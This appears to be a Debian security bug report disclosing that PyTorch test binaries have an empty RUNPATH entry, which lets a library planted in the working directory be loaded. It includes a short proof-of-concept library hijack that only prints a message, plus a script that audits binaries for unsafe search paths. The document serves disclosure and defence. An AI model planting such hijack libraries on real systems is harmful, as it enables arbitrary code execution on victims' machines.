Package: python3-torch
Version: 2.6.0+dfsg-9+b2
Severity: important
Tags: security
*Summary:*
The PyTorch distribution package (python3-torch) installs several compiled
C++ binaries under:
/usr/lib/python3/dist-packages/torch/bin/
Multiple binaries are built with an empty entry in their RUNPATH header,
which appears as a leading colon:
:$ORIGIN/../lib
An empty RUNPATH element causes the current working directory (CWD) to be
included in the dynamic loader's library search path. As a result, an
attacker may be able to achieve arbitrary code execution by placing a
malicious shared library in a directory and inducing a victim to execute
one of the affected binaries from that location.
This issue is an instance of CWE-426 (Untrusted Search Path).
*Impact:*
If a developer, researcher, or automated process executes one of the
affected binaries while its current working directory is
attacker-controlled (for example, a cloned repository, downloaded dataset,
extracted archive, shared workspace, or /tmp directory), the dynamic loader
may load attacker-controlled shared libraries from that directory.
Code execution occurs during dynamic library loading, prior to execution of
the program's main() function.
*Affected Binaries:*
I tested 14 binaries shipped in torch/bin and successfully exploited the
following 9 binaries:
- test_api
- FileStoreTest
- HashStoreTest
- TCPStoreTest
- test_cpp_rpc
- test_dist_autograd
- test_edge_op_registration
- test_lazy
- test_tensorexpr
*Verification:*
$ readelf -d /usr/lib/python3/dist-packages/torch/bin/test_api | grep RUNPATH
0x000000000000001d (RUNPATH) Library runpath: [:$ORIGIN/../lib]
The leading colon represents an empty RUNPATH element.
*Example:*
$ mkdir -p /tmp/malicious_workspace
$ cd /tmp/malicious_workspace
$ cat << 'EOF' > poc_libm.c
#include <stdio.h>
#include <stdlib.h>
__attribute__((constructor)) void exploit() {
    printf("\n[!!!] PWNED: Arbitrary Code Execution Achieved! [!!!]\n");
    exit(0);
}
EOF
$ gcc -shared -fPIC poc_libm.c -o libm.so.6 -Wl,-f,/lib/aarch64-linux-gnu/libm.so.6
$ cd /tmp/malicious_workspace
$ /usr/lib/python3/dist-packages/torch/bin/test_api
Result:
[!!!] PWNED: Arbitrary Code Execution Achieved! [!!!]
The binary loads the attacker-controlled libm.so.6 from the current working
directory and executes the library constructor during dynamic linking.
*Proposed Fix:*
The empty RUNPATH entry should be removed during packaging or build
generation so that the affected binaries no longer include the current
working directory in their library search path.
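
One way to check a build tree or an installed package for the condition shown under *Verification*, as an added example that is not part of the original report or of the package: it filters `readelf -d` output, splits each RUNPATH/RPATH value on colons and reports empty elements. It goes slightly beyond the report by also flagging relative elements, which the loader likewise resolves against the current working directory; the function names and the script name are hypothetical.

```shell
#!/bin/sh
# Added example; function names are hypothetical, not part of any package.

# check_runpath VALUE: print a reason for each element the loader would
# resolve against the current working directory; return 1 if any was found.
check_runpath() {
    bad=0
    rest="$1:"          # sentinel colon so a trailing empty element is seen
    while [ -n "$rest" ]; do
        elem=${rest%%:*}
        rest=${rest#*:}
        case $elem in
            '') echo "empty element (resolves to CWD)"; bad=1 ;;
            /*|'$ORIGIN'*|'${ORIGIN}'*) ;;   # absolute or relative to the binary
            *)  echo "relative element: $elem"; bad=1 ;;
        esac
    done
    return $bad
}

# runpaths_from_readelf: filter `readelf -d` output on stdin to "TAG VALUE".
runpaths_from_readelf() {
    sed -n -E 's/.*\((RUNPATH|RPATH)\).*\[(.*)\][[:space:]]*$/\1 \2/p'
}

# scan_dir DIR: report every regular file in DIR with an unsafe search path.
scan_dir() {
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        readelf -d "$f" 2>/dev/null | runpaths_from_readelf |
        while read -r tag value; do
            reasons=$(check_runpath "$value") ||
                printf '%s: %s [%s]: %s\n' "$f" "$tag" "$value" "$reasons"
        done
    done
}

# Usage: sh audit_runpath.sh /usr/lib/python3/dist-packages/torch/bin
if [ "$#" -gt 0 ]; then scan_dir "$1"; fi
```

Run against the package's bin directory after a rebuild, the script prints nothing once the empty element is gone.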